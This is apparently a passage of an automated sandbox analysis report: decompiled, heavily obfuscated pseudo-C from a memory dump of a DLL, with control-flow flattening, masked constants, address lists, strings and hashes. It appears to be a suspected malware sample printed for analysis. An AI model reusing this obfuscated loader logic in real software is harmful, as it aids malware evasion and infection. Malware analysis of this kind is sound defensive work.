				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = E00D34BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E00D3DDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										E00D52B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											E00D4E358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												E00D4E358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
													_t846 = E00D3ED66(_v20, _v184, _t987, _v248, _v124, _v152, _v204, _a40, _t876, _v104, _a20, _t876, _v28, _v48);
													_t876 = _a28;
													_t989 =  &(_t989[0xe]);
													_v300 = _t846;
													_t937 = 0xd154a5a;
													_t978 =  !=  ? 0xd154a5a : 0xedc04fb;
													continue;
												}
											}
										}
									}
								}
							}
							L43:
							return _t874;
						}
						__eflags = _t978 - _t937;
						if(_t978 == _t937) {
							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E00D4E1F8(0xd31a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = E00D34A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E00D4FECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E00D53E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E00D4C8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E00D53E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E00D3EF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									E00D4E358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E00D510DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}

0x00d467f8
0x00d46800
0x00d4680a
0x00d46811
0x00d46818
0x00d4681f
0x00d46826
0x00d4682d
0x00d4682e
0x00d46835
0x00d46836
0x00d4683d
0x00d46844
0x00d4684b
0x00d46852
0x00d46853
0x00d46854
0x00d46859
0x00d46861
0x00d46864
0x00d4686e
0x00d46878
0x00d46880
0x00d46882
0x00d4688d
0x00d46892
0x00d4689d
0x00d468a8
0x00d468b3
0x00d468be
0x00d468c9
0x00d468d4
0x00d468df
0x00d468ea
0x00d468f5
0x00d46900
0x00d4690b
0x00d46916
0x00d46921
0x00d4692c
0x00d46937
0x00d4693f
0x00d46944
0x00d46951
0x00d46956
0x00d46960
0x00d46965
0x00d4696b
0x00d46973
0x00d4697e
0x00d46989
0x00d46994
0x00d4699c
0x00d469a8
0x00d469ab
0x00d469ad
0x00d469b1
0x00d469b6
0x00d469c0
0x00d469cc
0x00d469d1
0x00d469d7
0x00d469e4
0x00d469e5
0x00d469e9
0x00d469f1
0x00d469fc
0x00d46a07
0x00d46a12
0x00d46a1d
0x00d46a28
0x00d46a30
0x00d46a3b
0x00d46a43
0x00d46a4b
0x00d46a53
0x00d46a5b
0x00d46a63
0x00d46a70
0x00d46a74
0x00d46a7c
0x00d46a84
0x00d46a8c
0x00d46a99
0x00d46a9d
0x00d46aa2
0x00d46aa7
0x00d46aaf
0x00d46abc
0x00d46ac0
0x00d46ac5
0x00d46aca
0x00d46ad2
0x00d46ae6
0x00d46aed
0x00d46af8
0x00d46b03
0x00d46b0b
0x00d46b13
0x00d46b18
0x00d46b20
0x00d46b28
0x00d46b30
0x00d46b38
0x00d46b42
0x00d46b46
0x00d46b4e
0x00d46b56
0x00d46b5b
0x00d46b63
0x00d46b68
0x00d46b70
0x00d46b78
0x00d46b80
0x00d46b88
0x00d46b95
0x00d46b99
0x00d46b9e
0x00d46ba6
0x00d46bae
0x00d46bb6
0x00d46bbe
0x00d46bcb
0x00d46bd4
0x00d46bd8
0x00d46be0
0x00d46bed
0x00d46bf3
0x00d46bfb
0x00d46c03
0x00d46c0b
0x00d46c13
0x00d46c1b
0x00d46c2a
0x00d46c2d
0x00d46c31
0x00d46c39
0x00d46c41
0x00d46c49
0x00d46c4e
0x00d46c56
0x00d46c5e
0x00d46c6b
0x00d46c6f
0x00d46c77
0x00d46c7f
0x00d46c8b
0x00d46c90
0x00d46c96
0x00d46c9e
0x00d46ca6
0x00d46cae
0x00d46cb6
0x00d46cbe
0x00d46cc9
0x00d46cd1
0x00d46cdc
0x00d46ce7
0x00d46cef
0x00d46cf7
0x00d46d03
0x00d46d08
0x00d46d0e
0x00d46d16
0x00d46d21
0x00d46d30
0x00d46d35
0x00d46d3e
0x00d46d49
0x00d46d5c
0x00d46d5d
0x00d46d64
0x00d46d6f
0x00d46d82
0x00d46d89
0x00d46d94
0x00d46d9f
0x00d46daa
0x00d46db5
0x00d46dc0
0x00d46dce
0x00d46dd2
0x00d46dda
0x00d46de2
0x00d46dea
0x00d46df7
0x00d46e02
0x00d46e0a
0x00d46e15
0x00d46e29
0x00d46e2e
0x00d46e37
0x00d46e42
0x00d46e4d
0x00d46e60
0x00d46e63
0x00d46e66
0x00d46e6d
0x00d46e78
0x00d46e80
0x00d46e88
0x00d46e90
0x00d46e98
0x00d46ea0
0x00d46eab
0x00d46eb3
0x00d46ebe
0x00d46ec9
0x00d46ed6
0x00d46eda
0x00d46ee2
0x00d46eea
0x00d46ef2
0x00d46efd
0x00d46f08
0x00d46f13
0x00d46f1e
0x00d46f29
0x00d46f34
0x00d46f3f
0x00d46f47
0x00d46f52
0x00d46f5d
0x00d46f68
0x00d46f70
0x00d46f7b
0x00d46f83
0x00d46f8d
0x00d46f99
0x00d46f9d
0x00d46fa5
0x00d46fb0
0x00d46fb8
0x00d46fc3
0x00d46fce
0x00d46fe1
0x00d46fe8
0x00d46ff3
0x00d47005
0x00d4700a
0x00d4701a
0x00d4701d
0x00d47024
0x00d47031
0x00d47039
0x00d47041
0x00d4704f
0x00d47054
0x00d47058
0x00d47060
0x00d4706b
0x00d47076
0x00d47081
0x00d4708c
0x00d47097
0x00d470a2
0x00d470b1
0x00d470b2
0x00d470b6
0x00d470c3
0x00d470c7
0x00d470cf
0x00d470d7
0x00d470db
0x00d470e0
0x00d470e8
0x00d470f0
0x00d470fb
0x00d47103
0x00d4710e
0x00d47119
0x00d47124
0x00d4712f
0x00d4713a
0x00d47145
0x00d47150
0x00d4715b
0x00d47166
0x00d47171
0x00d47179
0x00d47186
0x00d4718a
0x00d4718f
0x00d47197
0x00d4719f
0x00d471a7
0x00d471af
0x00d471b7
0x00d471bf
0x00d471ca
0x00d471d5
0x00d471e0
0x00d471eb
0x00d471f3
0x00d471fe
0x00d47209
0x00d4721c
0x00d47223
0x00d4722e
0x00d4723c
0x00d47240
0x00d47245
0x00d4724d
0x00d47255
0x00d4725d
0x00d47262
0x00d4726f
0x00d47273
0x00d4727b
0x00d47285
0x00d47291
0x00d47292
0x00d47296
0x00d4729e
0x00d472a6
0x00d472b1
0x00d472bc
0x00d472c7
0x00d472d2
0x00d472da
0x00d472e5
0x00d472f0
0x00d472f8
0x00d47300
0x00d47308
0x00d4730d
0x00d47315
0x00d47329
0x00d47330
0x00d4733b
0x00d47346
0x00d4734e
0x00d4735b
0x00d4735f
0x00d47367
0x00d4736f
0x00d4737a
0x00d47382
0x00d4738a
0x00d47395
0x00d473a0
0x00d473ab
0x00d473b6
0x00d473be
0x00d473c6
0x00d473ce
0x00d473d6
0x00d473de
0x00d473f1
0x00d473f8
0x00d47400
0x00d4740b
0x00d4741e
0x00d47425
0x00d4742d
0x00d47438
0x00d47443
0x00d4744e
0x00d47456
0x00d47461
0x00d47469
0x00d47476
0x00d4747a
0x00d47482
0x00d4748a
0x00d47495
0x00d474a0
0x00d474ab
0x00d474b3
0x00d474b8
0x00d474bd
0x00d474c5
0x00d474cd
0x00d474d2
0x00d474da
0x00d474e5
0x00d474f0
0x00d474f8
0x00d47503
0x00d4750a
0x00d47511
0x00d47511
0x00d47511
0x00d47516
0x00d47516
0x00d4751a
0x00d4751a
0x00d4751a
0x00d47520
0x00000000
0x00000000
0x00d47526
0x00d476ab
0x00000000
0x00d4752c
0x00d47532
0x00d47699
0x00d4769b
0x00d476a2
0x00d476a3
0x00000000
0x00d47538
0x00d4753e
0x00d47651
0x00d4765d
0x00d47672
0x00d47679
0x00d4767e
0x00d47683
0x00d47915
0x00d47915
0x00d4791c
0x00000000
0x00d47544
0x00d4754a
0x00d4761e
0x00d47623
0x00000000
0x00d47550
0x00d47556
0x00d475f0
0x00d475f5
0x00d475fa
0x00d475fc
0x00d475fc
0x00000000
0x00d4755c
0x00d47563
0x00d47921
0x00d47921
0x00d47927
0x00d47516
0x00000000
0x00d47516
0x00d47569
0x00d475b6
0x00d475bb
0x00d475c2
0x00d475c7
0x00d475d0
0x00d475d5
0x00000000
0x00d475d5
0x00d47563
0x00d47556
0x00d4754a
0x00d4753e
0x00d47532
0x00d47945
0x00d47951
0x00d47951
0x00d476b5
0x00d476b7
0x00d47772
0x00d47775
0x00d477a6
0x00d47777
0x00d47777
0x00d47783
0x00d4778a
0x00d47795
0x00d4779a
0x00d4779d
0x00d4779d
0x00d477e6
0x00d477ed
0x00d477ed
0x00d477ef
0x00d477f1
0x00d477f1
0x00d47841
0x00d47858
0x00d4785d
0x00d47860
0x00d47862
0x00d47910
0x00000000
0x00d47868
0x00d4788b
0x00d47892
0x00d47897
0x00d4789a
0x00d4789c
0x00d478c6
0x00d478d6
0x00d478d6
0x00d478d6
0x00d478fe
0x00d47903
0x00d47903
0x00d47906
0x00000000
0x00d47906
0x00d476bd
0x00d476bd
0x00d476c3
0x00d47763
0x00d4776a
0x00000000
0x00d476c9
0x00d476c9
0x00d476cf
0x00d4793e
0x00d476d5
0x00d476d5
0x00d476db
0x00d476f3
0x00d476f5
0x00d476f7
0x00d47705
0x00d47705
0x00d476f9
0x00d47700
0x00d47700
0x00d47707
0x00d4772c
0x00d47731
0x00d47736
0x00d4773e
0x00000000
0x00d476dd
0x00d476dd
0x00d476e3
0x00000000
0x00d476e9
0x00d476e9
0x00000000
0x00d476e9
0x00d476e3
0x00d476db
0x00d476cf
0x00d476c3
0x00000000
0x00d476b7
0x00d47516

Strings

R<, xrefs: 00D46DC0
H#, xrefs: 00D473B6
LG, xrefs: 00D46892
c', xrefs: 00D46EF2
OHR, xrefs: 00D47171
n3u, xrefs: 00D4692C
)fVX, xrefs: 00D468B3
^, xrefs: 00D4706B
2 ], xrefs: 00D472F0
=o, xrefs: 00D46F70
OI, xrefs: 00D47058
!, xrefs: 00D4747A
&B, xrefs: 00D46E80

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
API String ID: 0-4090907037
Opcode ID: 746d143d87de2caa746fbd8a9e0e72f52893b5679975fb0cae17dc166e4b2ff2
Instruction ID: b8286730b30568bdce0a0092d63692eff4eeb6204eb48fd02b86561f3c90e09c
Opcode Fuzzy Hash: 746d143d87de2caa746fbd8a9e0e72f52893b5679975fb0cae17dc166e4b2ff2
Instruction Fuzzy Hash: 8792FDB1509381CFD3B9CF25C58AA8BBBE1BBC4308F10891DE5D996260D7B58949CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00D4A474, Relevance: 15.4, Strings: 12, Instructions: 357
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00D4A474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
